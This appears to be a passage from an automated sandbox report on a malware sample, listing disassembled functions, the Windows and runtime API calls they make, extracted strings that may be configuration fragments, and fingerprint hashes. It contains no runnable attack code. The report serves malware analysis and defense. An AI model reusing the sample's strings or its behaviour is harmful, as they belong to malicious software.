                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: 902b6bb22b4beeaca616419503386a8923ae9a71252b9db3ac63a888ef19d089
                                                                                                                                                                                      • Instruction ID: bec8201447803e853ce2af44a1586731692c3e08d6a625655254225a6deac83b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 902b6bb22b4beeaca616419503386a8923ae9a71252b9db3ac63a888ef19d089
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CE0E5315647129AEE3D36FABC00B5B7B98EF521B0F05C130DD19921C0DF10D8008EE2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000000,?,0119240A,?,?,00000000,?,0119240A,00000000,0000000C), ref: 01192037
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                      • Opcode ID: d3332cf26038f8662a8e06a87a62c1835da794353626b63dad2e231d41043a83
                                                                                                                                                                                      • Instruction ID: 3f3ee749e3a607c0ca6d504da3c5718db2a3a61de80010169a1f66e446a227ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: d3332cf26038f8662a8e06a87a62c1835da794353626b63dad2e231d41043a83
                                                                                                                                                                                      • Instruction Fuzzy Hash: B4D06C3200010DBBDF128E84ED46EDA3FAAFB48714F014010BA2856020C732E861AB95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(0002BF20), ref: 01185444
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                      • Opcode ID: 8c7e2fc9cb13351e2d891ea623aa20d46d7b34809abc71546f77db86e00187d1
                                                                                                                                                                                      • Instruction ID: c6f393e0732ac2d5ad6e54240d38dfda0116cc52e56f6ada52e82f6f089ddae5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c7e2fc9cb13351e2d891ea623aa20d46d7b34809abc71546f77db86e00187d1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F0D175A40619ABC708BB6D8D0271D7BB5EB16A24F844258E82167280DB7019044BE2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 011913B7
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190F6D
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190F7F
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190F91
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FA3
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FB5
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FC7
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FD9
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FEB
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01190FFD
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 0119100F
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01191021
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01191033
                                                                                                                                                                                        • Part of subcall function 01190F50: _free.LIBCMT ref: 01191045
                                                                                                                                                                                      • _free.LIBCMT ref: 011913AC
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 011913CE
                                                                                                                                                                                      • _free.LIBCMT ref: 011913E3
                                                                                                                                                                                      • _free.LIBCMT ref: 011913EE
                                                                                                                                                                                      • _free.LIBCMT ref: 01191410
                                                                                                                                                                                      • _free.LIBCMT ref: 01191423
                                                                                                                                                                                      • _free.LIBCMT ref: 01191431
                                                                                                                                                                                      • _free.LIBCMT ref: 0119143C
                                                                                                                                                                                      • _free.LIBCMT ref: 01191474
                                                                                                                                                                                      • _free.LIBCMT ref: 0119147B
                                                                                                                                                                                      • _free.LIBCMT ref: 01191498
                                                                                                                                                                                      • _free.LIBCMT ref: 011914B0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                      • Opcode ID: 6738bacc8227382ed240496538c160ab33979077a2a005b3386dabdad4408abe
                                                                                                                                                                                      • Instruction ID: 754b71db115ba8971c10235fdd322197f938c2dcb99b23588f8957d919c6f74e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6738bacc8227382ed240496538c160ab33979077a2a005b3386dabdad4408abe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 85316D71608302EFEF2AAA7DE944B5A77E9EF04364F148429E969D7590DF31F980CB10
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 01188972
                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 01188999
                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 01188AA5
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 01188B80
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 01188C07
                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 01188C22
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                      • Opcode ID: 0461b3333ff32b5bd464de1085f59f824d461e5d2d83d0c92fe13229ba903efe
                                                                                                                                                                                      • Instruction ID: 2fd8e61a4b3179143a94238ac7bb4efd0a507d48ec6b11050cfda1c813894e5f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0461b3333ff32b5bd464de1085f59f824d461e5d2d83d0c92fe13229ba903efe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C17D71C0020AEFCF2DEF98D8809AEBBB5BF54314F84855AE8156B256D331D951CFA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DAF0
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DAFC
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB07
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB12
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB1D
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB28
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB33
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB3E
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB49
                                                                                                                                                                                      • _free.LIBCMT ref: 0118DB57
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: d7cc9a6fc1fc9f78eb15e57cbbd1961639c3abc672da0ffb35513488a97a6c1b
                                                                                                                                                                                      • Instruction ID: 53dfe9fe94deb90d8e04916535dcc43d90143dfdedeab326e69160b37be91c7e
                                                                                                                                                                                      • Opcode Fuzzy Hash: d7cc9a6fc1fc9f78eb15e57cbbd1961639c3abc672da0ffb35513488a97a6c1b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F2187B6904209EFCF46EFD5D840DDD7BB9AF18344B0181A5E915DB161EB32EA54CF80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9482a61842854726ad1e1e62b8cf8058ff34312d61da28d7e9d8e39123b9a777
                                                                                                                                                                                      • Instruction ID: 7369e3f67227fd4dc257d7140148aac9143cc96b47a6119fcbed98cd017bc081
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9482a61842854726ad1e1e62b8cf8058ff34312d61da28d7e9d8e39123b9a777
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C1D4B0E04245AFEF5EDF9CD880BAD7BB2BF49314F04405AE625AB292C7709941CF61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                                                                      • Opcode ID: f08e7d5d50140b763bb3fd8c03c53e95bc85194630ae1484d4ae370cbc367036
                                                                                                                                                                                      • Instruction ID: 7b11fbeee9645ad0770de4a797989f95536656e427e3fa93a53d94d2fd5e7e41
                                                                                                                                                                                      • Opcode Fuzzy Hash: f08e7d5d50140b763bb3fd8c03c53e95bc85194630ae1484d4ae370cbc367036
                                                                                                                                                                                      • Instruction Fuzzy Hash: E551F7B1D04306AEEF2DAFBD9840A6D7BECAF09318F048169F5759B181FB319581CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0117F0F4
                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0117F5BE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PathTempXinvalid_argumentstd::_
                                                                                                                                                                                      • String ID: 853321935212$ZOu=$Zyy=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                      • API String ID: 3948722134-3284337638
                                                                                                                                                                                      • Opcode ID: 2fe4546f8f954996cfc93d27752267315007f0658e7cf3e948f7c744bb774e6d
                                                                                                                                                                                      • Instruction ID: 172f115c3f90626030b54a0c44558fca29021c52a91d403ef60bc3c56d3fde91
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fe4546f8f954996cfc93d27752267315007f0658e7cf3e948f7c744bb774e6d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17C1F571A002499BDB1CEF38CD9578D7FB6EF46318F94819CE815973C1CB359A848BA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01188257
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0118825F
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 011882E8
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 01188313
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01188368
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: af2d8176db7e13625021166a5b91d3988ce3b5a845da4bbea1e0d94e2726709e
                                                                                                                                                                                      • Instruction ID: c602fa283fd693c728a1bba4b4406df36ed2e07de1a284d00c93b2ae46cd56fe
                                                                                                                                                                                      • Opcode Fuzzy Hash: af2d8176db7e13625021166a5b91d3988ce3b5a845da4bbea1e0d94e2726709e
                                                                                                                                                                                      • Instruction Fuzzy Hash: F241A134A006099FCF18EF68C880AAEBFB5BF45328F44C055E9259B392D731DA01CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                      • Opcode ID: 2b9f546f50053069761b93ab580e6573c2e58b783b0d300689fb3b6ba8641411
                                                                                                                                                                                      • Instruction ID: 651bd9846b46a3bcab9f0782834b0e6690578aef244606d6e77ac984ba3ae0dd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b9f546f50053069761b93ab580e6573c2e58b783b0d300689fb3b6ba8641411
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8521AB71A05321BBDF3DAAA8AC44B5A7B649F016B0F154125FD25A72C1DB30DD01DEE3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 011910B7: _free.LIBCMT ref: 011910DC
                                                                                                                                                                                      • _free.LIBCMT ref: 0119113D
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 01191148
                                                                                                                                                                                      • _free.LIBCMT ref: 01191153
                                                                                                                                                                                      • _free.LIBCMT ref: 011911A7
                                                                                                                                                                                      • _free.LIBCMT ref: 011911B2
                                                                                                                                                                                      • _free.LIBCMT ref: 011911BD
                                                                                                                                                                                      • _free.LIBCMT ref: 011911C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction ID: 966a982c3eef52c58529a103279634072df63ea308850aafd50bc8e0dce16191
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6511BEB1680B46FADF35BBF0CC45FCB779CAF21314F444918A6A9A60D0DB26B8408A42
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,01175020,00000000), ref: 011927F2
                                                                                                                                                                                      • __fassign.LIBCMT ref: 011929D1
                                                                                                                                                                                      • __fassign.LIBCMT ref: 011929EE
                                                                                                                                                                                      • WriteFile.KERNEL32(?,01175020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01192A36
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01192A76
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01192B22
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4031098158-0
                                                                                                                                                                                      • Opcode ID: 2233b9e666506701da4cd7067c31b2ffdb5bf97933d0886230d8c3cb7ec308f9
                                                                                                                                                                                      • Instruction ID: 365eec452080ba53990f27a9db81266ac97579941984fcad9f896971be7dbd84
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2233b9e666506701da4cd7067c31b2ffdb5bf97933d0886230d8c3cb7ec308f9
                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D19C71D00259AFCF19CFA8C8909EDBBB5FF49314F28416AE966BB241D730A946CF50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,01188537,01188126,01187775), ref: 0118854E
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0118855C
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01188575
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,01188537,01188126,01187775), ref: 011885C7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
